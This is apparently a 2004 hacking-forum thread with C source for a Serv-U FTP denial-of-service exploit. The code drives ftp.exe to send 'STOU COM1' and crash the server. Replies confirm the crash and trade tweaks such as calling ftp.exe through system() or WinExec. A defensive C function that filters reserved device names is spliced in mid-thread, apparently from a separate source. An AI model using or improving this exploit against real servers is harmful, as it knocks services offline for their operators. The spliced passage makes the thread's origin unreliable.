Thanks to Ecko for his Perl exploit....made me think of doing this one and it was challenging
This exploit is not as good as Ecko's one if you can run Perl code, but if you can't you can use this one if you have ftp.exe in your computer root....I'll try making a code that doesn't need ftp.exe later....
Use it with your mind....nothing illegal too !
CODE
//--------------------------------------------------------------------------------
// Serv-U (up to 5.2) DoS Exploit by Mortello
// Advisory : http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html
// This exploit requires that you have ftp.exe in your systemroot.
// Couldn't figure out how to get the %systemroot% in the spawnl(), so any idea
// would be appreciated...
// This is my first exploit....guess the code could have been better, now I'm
// going to try to make a DoS exploit not using the ftp.exe...
// Dedicated to : The piece of cheddar and the limonade I took doing this code.
// Greetings : You know who you are !
// Use this program on YOUR computer ONLY for TESTING purposes ONLY. I take no
// responsibility on the other uses of this program !
//--------------------------------------------------------------------------------

#include <stdio.h>
#include <process.h>

/* The following function will help the user understand how to use this program. */
void usage(char name[]);
/* Program call to create a ftp.txt file.*/
void file(void);
/* Call ftp.exe and execute it using the ftp.txt created earlier. */
void execute(void);

char *ip;
int port;
char *user;
char *password;

int main(int argc, char* argv[])
{
    if (argc < 5)
        usage(argv[0]);
    else if (atoi(argv[2]) < 0 || atoi(argv[2]) > 65535)
        usage(argv[0]);
    else
    {
        ip = argv[1];
        port = atoi(argv[2]);
        user = argv[3];
        password = argv[4];
        puts("Serv-U STOU DoS Exploit by Mortello");
        file();
        execute();
    }
    return 0;
}

// How to use the program !
void usage(char name[])
{
    puts("");
    puts("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*");
    puts(" Serv-U Denial Of Service, tested on Serv-U 5.1.0.0 and 5.0.0.0.");
    puts(" Should work on latest serv-U (as of Sept. 12th, 2004)");
    puts(" Use this program on YOUR computer ONLY for TESTING purposes ONLY. I take no");
    puts(" responsibility on the other uses of this program !");
    puts(" USAGE :");
    printf(" %s \"IP\" \"PORT\" \"USERNAME\" \"PASSWORD\"\n", name);
    puts(" Account needs to be able to log-in, nothing else necessary.");
    puts("*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*");
    puts("");
}

void file()
{
    FILE *fp;
    // Will write in a ftp.txt file.
    if ((fp = fopen("ftp.txt", "w")) != NULL)
    {
        fprintf(fp, "open %s %d\n", ip, port);
        fprintf(fp, "%s\n", user);
        fprintf(fp, "%s\n", password);
        fprintf(fp, "binary\n");
        fprintf(fp, "quote STOU COM1\n");
        //Would also have worked :
        //fprintf(fp, "quote STOU LPT1\n");
        //fprintf(fp, "quote STOU PRN\n");
        //fprintf(fp, "quote STOU AUX\n");
        fprintf(fp, "quit");//If ftp.exe goes through this line, DoS didn't work.
        fclose(fp);
    }
    else
        // You don't have write perms on your comp ? strange !
        puts("No write permissions ?");
}

void execute()
{
    int value;
    // Part of code that I couldn't make work with %systemroot%
    value = spawnl(P_WAIT, "c:\\winnt\\system32\\ftp.exe", "ftp.exe", " -i -s:ftp.txt", NULL);
    value = spawnl(P_WAIT, "c:\\windows\\system32\\ftp.exe", "ftp.exe", " -i -s:ftp.txt", NULL);
    if (value == -1)
        puts("Problem!");
    else
    {
        remove("ftp.txt");
        puts("Server should have crashed by now !");
    }
}
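
Defender-side view of the bug above, as an added example that is not part of the original post: COM1, LPT1, PRN and AUX are Windows reserved device names, so the mitigation is for the server to refuse any path argument with a component that resolves to one. The function names below are hypothetical, and this sketch is not Serv-U's actual fix.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Reserved DOS device names; COMn and LPTn are matched separately below. */
static const char *const RESERVED[] = { "CON", "PRN", "AUX", "NUL" };

/* Case-insensitive compare of the first n bytes of s against an upper-case name. */
static int ieq(const char *s, size_t n, const char *name)
{
    if (strlen(name) != n) return 0;
    for (size_t i = 0; i < n; i++)
        if (toupper((unsigned char)s[i]) != name[i]) return 0;
    return 1;
}

/* One path component. Legacy Win32 path parsing ignores the extension and
   trailing spaces, so "com1", "COM1.txt" and "aux " all reach the device. */
static int component_is_device(const char *c, size_t len)
{
    size_t n = 0;
    while (n < len && c[n] != '.' && c[n] != ':') n++;  /* cut at extension/stream */
    while (n > 0 && c[n - 1] == ' ') n--;               /* drop trailing spaces */
    for (size_t i = 0; i < sizeof RESERVED / sizeof RESERVED[0]; i++)
        if (ieq(c, n, RESERVED[i])) return 1;
    /* COM or LPT followed by exactly one digit (0 is blocked too, conservatively). */
    if (n == 4 && (ieq(c, 3, "COM") || ieq(c, 3, "LPT")))
        return isdigit((unsigned char)c[3]) != 0;
    return 0;
}

/* Hypothetical server-side check for the argument of STOU/STOR/RETR and similar:
   returns 1 if any component names a reserved device and must be rejected. */
int ftp_arg_names_device(const char *path)
{
    const char *p = path;
    while (*p) {
        size_t len = strcspn(p, "/\\");   /* next component, either separator */
        if (len && component_is_device(p, len)) return 1;
        p += len;
        if (*p) p++;                      /* skip the separator */
    }
    return 0;
}
```

A server would call this before opening the file and answer with a 5xx reply when it returns 1.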
mortello
Sep 13 2004, 02:16 AM
Here it is compiled for you !
nackas
Sep 13 2004, 06:19 AM
Hmm interesting stuff mortello! Will test this on my local ftp and see how it goes
EDIT: ServUDaemon.exe has encountered a problem and needs to close. We are sorry for the inconvenience. Nice one!
arn0ld
Sep 13 2004, 10:04 AM
for me not saying "problem!" on and on and i'm sure the pass user are correct
Paul
Sep 13 2004, 03:35 PM
The "bug" itself sux, but its nice to see some1 code an sploit for it. Good job
mortello
Sep 13 2004, 03:41 PM
QUOTE (arn0ld @ Sep 13 2004, 10:04 AM)
for me not saying "problem!" on and on and i'm sure the pass user are correct
what's your %systemroot% ? if it is c:\winnt\ or c:\windows then you don't have ftp.exe in that folder and there is a problem....hence the "Problem!" Otherwise, you have a different %systemroot% and I'd like to add it to the code if you could tell me what it is
usch
Sep 13 2004, 03:49 PM
ehm dude. just use "ftp.exe" instead of "C:\windows..." cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path. e.g. this line of code works i tested it: WinExec("ftp.exe",SW_SHOW);
hope i helped
see ya usch
mortello
Sep 13 2004, 04:24 PM
QUOTE (usch @ Sep 13 2004, 03:49 PM)
ehm dude. just use "ftp.exe" instead of "C:\windows..." cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path. e.g. this line of code works i tested it: WinExec("ftp.exe",SW_SHOW);
hope i helped
see ya usch
I tried using it with spawnl() but it didn't work....
I'll check some info on WinExec(...) and see what that does....thanks for the feedback
Figo
Sep 14 2004, 06:58 AM
QUOTE (usch @ Sep 13 2004, 03:49 PM)
ehm dude. just use "ftp.exe" instead of "C:\windows..." cause ftp.exe is recognized as a windows program and can be accessed from anywhere, so u dont need the path. e.g. this line of code works i tested it: WinExec("ftp.exe",SW_SHOW);
hope i helped
see ya usch
be sure c:\%systemroot%\system32\ is in ur path definition eh
dmg
Sep 20 2004, 07:29 PM
system("ftp.exe -i -s:ftp.txt");
should also work (not tested)